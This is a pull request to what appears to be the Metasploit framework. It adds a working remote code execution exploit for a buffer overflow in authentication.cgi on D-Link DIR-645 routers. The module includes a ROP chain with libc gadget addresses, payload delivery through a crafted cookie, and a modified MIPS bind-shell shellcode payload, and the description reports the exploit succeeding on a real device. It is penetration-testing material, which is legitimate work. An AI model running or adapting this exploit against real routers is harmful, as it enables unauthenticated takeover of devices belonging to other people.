### PR TITLE
D-Link authentication.cgi bof

### DIFF
--- a/modules/encoders/mipsle/longxor.rb
+++ b/modules/encoders/mipsle/longxor.rb
@@ -97,10 +97,10 @@ next:
   lw	$17, -4($25)		; load xor key in $17
 
 
-  li(	$13, -5)
-  nor	$13, $13, $0		; 4 in $13
+  li(	$18, -5)
+  nor	$18, $18, $0		; 4 in $13
 
-  addi	$15, $13, -3		; 1 in $15
+  addi	$15, $18, -3		; 1 in $15
 loop:
   lw	$8, -4($25)
 
@@ -108,9 +108,9 @@ loop:
   xor	$3, $8, $17
   sltu	$30, $23, $14		; enough loops?
   sw	$3, -4($25)
-  addi	$6, $13, -1		; 3 in $6 (for cacheflush)
+  addi	$6, $18, -1		; 3 in $6 (for cacheflush)
   bne	$0, $30, loop
-  addu	$25, $25, $13		; next instruction to decode :)
+  addu	$25, $25, $18		; next instruction to decode :)
 
 
 ;	addiu	$4, $16, -4	       	; not checked by Linux

--- a/modules/exploits/linux/http/dlink_authentication_bof.rb
+++ b/modules/exploits/linux/http/dlink_authentication_bof.rb
@@ -1,0 +1,207 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ManualRanking # the exploit as it is is excellent but we can't use any encoder
+
+  HttpFingerprint = { :pattern => [ /Linux,\ HTTP\/1.0,\ DIR-/ ] }
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'D-Link authentication.cgi Buffer Overflow',
+      'Description'    => %q{
+          This module exploits a anonymous remote code execution vulnerability on different D-Link routers.
+        This module has been tested successfully on D-Link DIR645A1_FW103B11. The devices DIR865LA1_FW101b06
+        and DIR845LA1_FW100b20 are also vulnerable and they were tested within an emulated environment.
+        This module does not support any available MSF encoders. If you would use the exec shellcode for MIPS
+        you have to change the BadChars configuration of the module manually.
+      },
+      'Author'         =>
+        [
+          'Roberto Paleari', # Vulnerability discovery
+          'Michael Messner <devnull[at]s3cur1ty.de>', #Metasploit module and verification on DIR865 and DIR845
+        ],
+      'License'        => MSF_LICENSE,
+      'Payload'        =>
+        {
+          'DisableNops' => true,
+          'Space'       => 1000,
+          'BadChars'    => "\x00\x2c\x3b\x09\x0a\x0d"
+          #'BadChars'    => "\x2c\x3b\x09\x0a\x0d" # for using with the exec payload
+          # we do not support encoders, if the exec payload should be used the \x00 byte has to be removed of the
+          # BadChars. We are trying to handle the final \x00 bytes within this exploit. There is also a final check
+          # for other \x00 characters.
+        },
+      'Platform'       => ['linux'],
+      'Arch'           => ARCH_MIPSLE,
+      'References'     =>
+        [
+          [ 'OSVDB', '95951' ],
+          [ 'EDB', '27283' ],
+          [ 'URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10008' ], #advisory on vendor web site
+          [ 'URL', 'http://www.dlink.com/us/en/home-solutions/connect/routers/dir-645-wireless-n-home-router-1000' ], #vendor web site of router
+          [ 'URL', 'http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt' ]              #original advisory
+        ],
+      'Targets'        =>
+        [
+          [ 'DLink DIR-645 1.03',
+            {
+              'Offset'      => 79,
+              'LibcBase'    => 0x2aaf8000,  #Router
+              #'LibcBase'    => 0x40854000,  # QEMU environment
+              'Ret'         => 0x436D0,     #reg S4 - gadget nr 2 - prepare ra wich is used after sleep
+              'RopPrepSleep' => 0x2F0F8,    #from libc
+              'RopSleep'    => 0x56BD0,     #from libc # Sleep Function Address # sleep() to flush the data cache
+              'RopPtrStack' => 0x0DEF0,     #3rd gadget for writing sp in S2
+              'RopJmpStack' => 0x52AB0      #4th - Jump stack
+            }
+          ]
+        ],
+      'DisclosureDate' => 'Feb 08 2013',
+      'DefaultTarget' => 0))
+  end
+
+  def check
+    begin
+      res = send_request_cgi({
+        'uri'     => "/authentication.cgi",
+        'method'  => 'GET'
+      })
+
+      if res && [200, 301, 302].include?(res.code)
+        return Exploit::CheckCode::Detected
+      end
+    rescue ::Rex::ConnectionError
+      return Exploit::CheckCode::Unknown
+    end
+
+    Exploit::CheckCode::Unknown
+  end
+
+  def exploit
+
+    # till today no encoder for MIPS is working with this device
+    # shellcode created the following way:
+    # ./msfpayload linux/mipsle/shell_bind_tcp R | ./msfencode -e mipsle/longxor -a mipsle -t elf -o /root/mipsle_longxor_bind
+    # [*] mipsle/longxor succeeded with size 324 (iteration=1)
+    # it works good on a typical debian MIPS-LE machine:
+    # [root@debian-mipsel ~]# chmod +x mipsle_longxor_bind
+    # [root@debian-mipsel ~]# ./mipsle_longxor_bind
+    # but it is not working on the router:
+    # chmod +x mipsle_longxor_bind
+    # ./mipsle_longxor_bind
+    # Illegal instruction
+    # so we check it here and exit if an encoder is configured
+    if datastore['ENCODER'] !~ /generic\/none/
+      fail_with(Failure::Unknown, "#{peer} - We don't support encoders. Try to set the encoder to generic/none")
+    end
+
+    print_status("#{peer} - Trying to access the vulnerable URL...")
+
+    unless check == Exploit::CheckCode::Detected
+      fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
+    end
+
+    # prepare our shellcode that triggers the crash:
+
+    shellcode = rand_text_alpha_upper(target['Offset'])                # padding
+    shellcode << "\x0a\x09\x26"                                        # our filler that is responsible for breaking our
+                                                                       # buffer and for correct cookie placement
+    shellcode << rand_text_alpha_upper(929)                            # space that is broken into multiple parts. Because
+                                                                       # we break our shellcode with bad characters right
+                                                                       # before we can find our modified cookie here
+    shellcode << rand_text_alpha_upper(12)                             # reg $s0 - $s2
+    shellcode << [target['LibcBase'] + target['RopSleep']].pack("V")   # reg $s3 - address of sleep
+    shellcode << [target['LibcBase'] + target.ret].pack("V")           # reg $s4 - gadget nr 2 - prepare ra wich is used after sleep
+
+        #.text:000436D0      move    $t9, $s3                   # put address of sleep from s3 to t9 and jump to it
+        #.text:000436D4      lw      $ra, 0x30+var_4($sp)       # load value from stack into ra -> to go there after sleep
+        #.text:000436D8      lw      $s4, 0x30+var_8($sp)       # address of our last gadget - jump to s2 (stack)
+        #.text:000436DC      lw      $s3, 0x30+var_C($sp)       # unused
+        #.text:000436E0      lw      $s2, 0x30+var_10($sp)      # unused
+        #.text:000436E4      lw      $s1, 0x30+var_14($sp)      # unused
+        #.text:000436E8      lw      $s0, 0x30+var_18($sp)      # unused
+        #.text:000436EC      jr      $t9                        # jump to sleep
+
+    shellcode << rand_text_alpha_upper(16)                                # unused registers $s5 to $s7 and $fp
+    shellcode << [target['LibcBase'] + target['RopPrepSleep']].pack("V")  # gadget nr 1 (prepare sleep)
+
+        #.text:0002F0F8      move    $t9, $s4                   # address of second gadget
+        #.text:0002F0FC      li      $a0, 1                     # parameter of sleept
+        #.text:0002F100      jalr    $t9                        # jump to second gadget
+
+    shellcode << rand_text_alpha_upper(40)                                # filler for padding
+    shellcode << [target['LibcBase'] + target['RopJmpStack']].pack("V")   # 4th gadget - jump to stack
+
+        #.text:00052AB0      move    $t9, $s2                   # address of stack is waiting in $s2
+        #.text:00052AB4      jalr    $t9                        # jump to the stack
+
+    shellcode << [target['LibcBase'] + target['RopPtrStack']].pack("V")   # 3rd gadget for writing sp in $s2
+
+        #.text:0000DEF0      addiu   $s2, $sp, 0xC8+var_B8      # write a address of our stack to $s2 - we jump later to this address
+        #.text:0000DEF4      li      $s1, 0x80                  # unused
+        #.text:0000DEF8      li      $s3, 0x16                  # unused
+        #.text:0000DEFC      move    $t9, $s4                   # in $s4 is address of last gadget which jumps to $s2
+        #.text:0000DF00      jalr    $t9                        # jump to the last gadget
+
+    shellcode << rand_text_alpha_upper(16)        # padding
+    shellcode << "\x90\xf7\x39\x23"               # addi $t9,$t9,-2160
+    shellcode << "\x08\xf8\x21\x03"               # jr $t9 -> jump to our shellcode (waiting in our cookie)
+    shellcode << "\xFE\xFE\xE0\x27"               # for pipelining
+    shellcode << rand_text_alpha_upper(139)       # final filler
+
+    # prepare our cookie that includes our payload
+    # for using the exec payload you have to remove the \x00 byte from the bad character set
+
+    if datastore['PAYLOAD'] =~ /exec/
+
+    # for this we have to strip out our \x00 bytes at the end
+    # the \x00 breaks the shellcode execution. We use the \x00 series on our stack to terminate
+    # the buffer in a correct way. We are not able to use any of the available encoders
+    # for this we have to prepare a correct shellcode the following way
+
+      payload_ = "\xFE\xFE\xE0\x27" * 3
+      payload_ << payload.encoded  # we are not able to use the encoded payload. We try to use the unencoded and remove the \x00
+                                   # bytes manually. Afterwards we check the payload for bad characters. If we find one of them
+                                   # our shellcode fails!
+      print_status("#{peer} - trying to fix the shellcode") if payload_.ends_with("\x00")
+
+      while payload_.ends_with("\x00")          # \x00 is a bad character but we do not support encoders for this payload.
+        payload_ = payload_.sub(/\x00$/,"")     # if we en/decode the \x00 bytes the shellcode fails!
+      end                                       # So we remove the string terminator at the end
+
+    else  #our shell payloads are handled here
+      payload_ = "\xFE\xFE\xE0\x27" * 3
+      payload_ << payload.encoded
+    end
+
+    # this check is only relevant if the \x00 byte was removed from the bad characters:
+    # in normal operation with a bind payload this check is not relevant
+    if payload_.include?("\x00")                 # if there are other \x00 bytes in the shellcode we fail
+     fail_with(Failure::Unknown, "#{peer} - Failed to prepare a null byte free payload")
+    end
+
+    # now lets rock it ...
+
+    print_status("#{peer} - Sending exploit ...")
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      #'uri' => "/authentication_gdb.cgi",	#for debugging on the router
+      'uri' => "/authentication.cgi",
+      'cookie'   => "uid=" << payload_,
+      'encode_params' => false,
+      'vars_post' => {
+        'uid'        => 'test',
+        'password'   => 'asd' << shellcode,
+      }
+    })
+    vprint_status("#{peer} - Now you could verify that the exploit was working correct ...")
+  end
+end

--- a/modules/exploits/linux/http/dlink_authentication_bof.rb
+++ b/modules/exploits/linux/http/dlink_authentication_bof.rb
@@ -18,9 +18,11 @@ class Metasploit3 < Msf::Exploit::Remote
       'Description'    => %q{
           This module exploits a anonymous remote code execution vulnerability on different D-Link routers.
         This module has been tested successfully on D-Link DIR645A1_FW103B11. The devices DIR865LA1_FW101b06
-        and DIR845LA1_FW100b20 are also vulnerable and they were tested within an emulated environment.
-        This module does not support any available MSF encoders. If you would use the exec shellcode for MIPS
-        you have to change the BadChars configuration of the module manually.
+        and DIR845LA1_FW100b20 are also vulnerable and they were tested within an emulated environment. They
+        are a little bit different in the first ROP gadget. Todo: Test and include these devices into this module.
+        This module does not support any available MSF encoders.
+        #If you would use the exec shellcode for MIPS
+        #you have to change the BadChars configuration of the module manually.
       },
       'Author'         =>
         [
@@ -32,8 +34,8 @@ class Metasploit3 < Msf::Exploit::Remote
         {
           'DisableNops' => true,
           'Space'       => 1000,
-          'BadChars'    => "\x00\x2c\x3b\x09\x0a\x0d"
-          #'BadChars'    => "\x2c\x3b\x09\x0a\x0d" # for using with the exec payload
+          #'BadChars'    => "\x00\x2c\x3b\x09\x0a\x0d"
+          'BadChars'    => "\x2c\x3b\x09\x0a\x0d" # for supporting the exec payload
           # we do not support encoders, if the exec payload should be used the \x00 byte has to be removed of the
           # BadChars. We are trying to handle the final \x00 bytes within this exploit. There is also a final check
           # for other \x00 characters.
@@ -165,6 +167,7 @@ class Metasploit3 < Msf::Exploit::Remote
     # the \x00 breaks the shellcode execution. We use the \x00 series on our stack to terminate
     # the buffer in a correct way. We are not able to use any of the available encoders
     # for this we have to prepare a correct shellcode the following way
+    # other way would be to directly include the shellcode for executing commands here ...
 
       payload_ = "\xFE\xFE\xE0\x27" * 3
       payload_ << payload.encoded  # we are not able to use the encoded payload. We try to use the unencoded and remove the \x00
@@ -183,6 +186,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     # this check is only relevant if the \x00 byte was removed from the bad characters:
     # in normal operation with a bind payload this check is not relevant
+    # for the exec shellcode this is important!
     if payload_.include?("\x00")                 # if there are other \x00 bytes in the shellcode we fail
      fail_with(Failure::Unknown, "#{peer} - Failed to prepare a null byte free payload")
     end

--- a/modules/payloads/singles/linux/mipsle/shell_bind_tcp_mod.rb
+++ b/modules/payloads/singles/linux/mipsle/shell_bind_tcp_mod.rb
@@ -1,0 +1,117 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+  include Msf::Payload::Single
+  include Msf::Payload::Linux
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Linux Command Shell, Bind TCP Inline',
+      'Description'   => 'Listen for a connection and spawn a command shell',
+      'Author'        =>
+        [
+          'scut',             # Original mips-irix-portshell shellcode
+          'vaicebine',        # Original shellcode mod
+          'Vlatko Kosturjak', # Metasploit module
+          'juan vazquez'      # Small fixes and optimizations
+        ],
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'linux',
+      'Arch'          => ARCH_MIPSLE,
+      'Handler'       => Msf::Handler::BindTcp,
+      'Session'       => Msf::Sessions::CommandShellUnix,
+      'Payload'       =>
+        {
+          'Offsets' => {} ,
+          'Payload' => ''
+        })
+    )
+  end
+
+  def generate
+    if !datastore['LPORT']
+      return super
+    end
+
+    port = Integer(datastore['LPORT'])
+    port = [port].pack("n").unpack("cc");
+
+    shellcode =
+    "\xe0\xff\xbd\x27" + #     addiu   sp,sp,-32
+    "\xfd\xff\x0e\x24" + #     li      t6,-3
+    "\x27\x20\xc0\x01" + #     nor     a0,t6,zero
+    "\x27\x28\xc0\x01" + #     nor     a1,t6,zero
+    "\xff\xff\x06\x28" + #     slti    a2,zero,-1
+    "\x57\x10\x02\x24" + #     li      v0,4183 ( __NR_socket )
+    "\x0c\x01\x01\x01" + #     syscall
+
+    "\xff\xff\x50\x30" + #     andi    s0,v0,0xffff
+    "\xef\xff\x0e\x24" + #     li      t6,-17                        ; t6: 0xffffffef
+    "\x27\x70\xc0\x01" + #     nor     t6,t6,zero                    ; t6: 0x10 (16)
+    port.pack("C2") + "\x0c\x24" +  #     li      t4,0xFFFF (port)   ; t4: 0x5c11 (0x115c == 4444 (default LPORT))
+    "\x04\x60\xcc\x01" + #     sllv    t4,t4,t6                      ; t4: 0x5c110000
+    "\xfd\xff\x0e\x24" + #     li      t6,-3                         ; t6: -3
+    "\x27\x70\xc0\x01" + #     nor     t6,t6,zero                    ; t6: 0x2
+    "\x25\x60\x8e\x01" + #     or      t4,t4,t6                      ; t4: 0x5c110002
+    "\xe0\xff\xac\xaf" + #     sw      t4,-32(sp)
+    "\xe4\xff\xa0\xaf" + #     sw      zero,-28(sp)
+    "\xe8\xff\xa0\xaf" + #     sw      zero,-24(sp)
+    "\xec\xff\xa0\xaf" + #     sw      zero,-20(sp)
+    "\x25\x20\x10\x02" + #     or      a0,s0,s0
+    "\xef\xff\x0e\x24" + #     li      t6,-17
+    "\x27\x30\xc0\x01" + #     nor     a2,t6,zero
+    "\xe0\xff\xa5\x23" + #     addi    a1,sp,-32
+    "\x49\x10\x02\x24" + #     li      v0,4169 ( __NR_bind )A
+    "\x0c\x01\x01\x01" + #     syscall
+
+    "\x25\x20\x10\x02" + #     or      a0,s0,s0
+    "\x01\x01\x05\x24" + #     li      a1,257
+    "\x4e\x10\x02\x24" + #     li      v0,4174 ( __NR_listen )
+    "\x0c\x01\x01\x01" + #     syscall
+
+    "\x25\x20\x10\x02" + #     or      a0,s0,s0
+    "\xff\xff\x05\x28" + #     slti    a1,zero,-1
+    "\xff\xff\x06\x28" + #     slti    a2,zero,-1
+    "\x48\x10\x02\x24" + #     li      v0,4168 ( __NR_accept )
+    "\x0c\x01\x01\x01" + #     syscall
+
+    "\xff\xff\xa2\xaf" + #     sw v0,-1(sp) # socket
+    "\xfd\xff\x11\x24" + #     li s1,-3
+    "\x27\x88\x20\x02" + #     nor s1,s1,zero
+    "\xff\xff\xa4\x8f" + #     lw a0,-1(sp)
+    "\x21\x28\x20\x02" + #     move a1,s1 # dup2_loop
+    "\xdf\x0f\x02\x24" + #     li v0,4063 ( __NR_dup2 )
+    "\x0c\x01\x01\x01" + #     syscall 0x40404
+    "\xff\xff\x10\x24" + #     li s0,-1
+    "\xff\xff\x31\x22" + #     addi s1,s1,-1
+    "\xfa\xff\x30\x16" + #     bne s1,s0 <dup2_loop>
+
+    "\xff\xff\x06\x28" + #     slti a2,zero,-1
+    "\x62\x69\x0f\x3c" + #     lui t7,0x2f2f "bi"
+    "\x2f\x2f\xef\x35" + #     ori t7,t7,0x6269 "//"
+    "\xec\xff\xaf\xaf" + #     sw t7,-20(sp)
+    "\x73\x68\x0e\x3c" + #     lui t6,0x6e2f "sh"
+    "\x6e\x2f\xce\x35" + #     ori t6,t6,0x7368 "n/"
+    "\xf0\xff\xae\xaf" + #     sw t6,-16(sp)
+    "\xf4\xff\xa0\xaf" + #     sw zero,-12(sp)
+    "\xec\xff\xa4\x27" + #     addiu a0,sp,-20
+    "\xf8\xff\xa4\xaf" + #     sw a0,-8(sp)
+    "\xfc\xff\xa0\xaf" + #     sw zero,-4(sp)
+    "\xf8\xff\xa5\x27" + #     addiu a1,sp,-8
+    "\xab\x0f\x02\x24" + #     li v0,4011 ( __NR_execve )
+    "\x0c\x01\x01\x01"   #     syscall 0x40404
+
+    return super + shellcode
+  end
+
+end


### PR DESCRIPTION
Hey Metasploit guys,

 I have tried to create some exploits out of the advisory by Roberto Paleari (http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt). This is the first Metasploit module for the vulnerability in authentication.cgi. The module for hedwig.cgi is also in the pipe. The vulnerability in post_login.xml looks for me that it is not directly exploitable from remote.

This device is a typical embedded router of dlink with some interesting constellations. ;)

First of all we have a quite big set of bad characters including \x0d which is part of the decoder stub. So I have played a bit with different registers and with the included code it is now possible to create a shellcode with the whole bad character set. The default settings do not change anything from the decoder ... 
But it does not really matter because the encoders are not working in combination with this devices. For me it looks like that we run into troubles with cache coherency and probably the system call for the context switch is not working correctly -> but this is just a guess ...

I have tried different payloads and encoder combinations. Also if I generate the payload manually and drop it as a binary to the target device, the payload crashes directly after the decoding stuff. The shellcode is correctly decoded but crashes on execution.

For getting the code execution to something useful I have modified the bind payload for MIPS-LE so that we have no bad characters in it. The new bind shell payload is included as shell_bind_tcp_mod.rb. The only modification was to change register t5 to t4:

```
port.pack("C2") + "\x0c\x24" +  #     li      t4,0xFFFF (port)   ; t4: 0x5c11 (0x115c == 4444 (default LPORT))
"\x04\x60\xcc\x01" + #     sllv    t4,t4,t6                      ; t4: 0x5c110000
"\xfd\xff\x0e\x24" + #     li      t6,-3                         ; t6: -3
"\x27\x70\xc0\x01" + #     nor     t6,t6,zero                    ; t6: 0x2
"\x25\x60\x8e\x01" + #     or      t4,t4,t6                      ; t4: 0x5c110002
"\xe0\xff\xac\xaf" + #     sw      t4,-32(sp)
```

Probably we are able to do some check for the encoder setting and the bad chars and can modify it on the fly?

The next thing is the exec shellcode that gets handled directly within the module. We have to remove the ending \x00 bytes and then it works good. The shellcode is directly embedded within a bunch of \x00 bytes. With this the command string gets terminated in a correct way. If we can include the changes in the bind shellcode we could probably remove this stuff completely.

Let me know what you think about it ... 

![dir645_authentication_bind_working](https://cloud.githubusercontent.com/assets/497520/3008420/c2a8b21c-debb-11e3-86d1-5a8d97e26607.png)

![dir645_authentication_exec_working](https://cloud.githubusercontent.com/assets/497520/3008425/cd10ce7e-debb-11e3-911b-d4894d69ec5d.png)

Thanks
Mike
